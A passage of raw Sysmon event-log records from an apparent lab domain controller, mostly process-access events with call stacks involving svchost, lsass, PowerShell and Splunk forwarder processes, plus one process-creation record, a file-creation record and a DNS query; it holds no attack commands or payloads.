Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5F-6005-7000-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5F-6005-7000-00000000A301}3104C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5F-6005-7000-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.601{59A5CD1D-8E5F-6005-7000-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.298{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.095{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.095{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x80000000000000002412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.033{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_3ynrvq0w.kpa.ps12021-01-18 13:34:23.033 10341000x80000000000000002411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.846{59A5CD1D-8E56-6005-2E00-00000000A301}2464c.f.f.c.4.5.d.0.2.5.d.0.d.6.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 10341000x80000000000000002409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.003{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.002{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.002{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\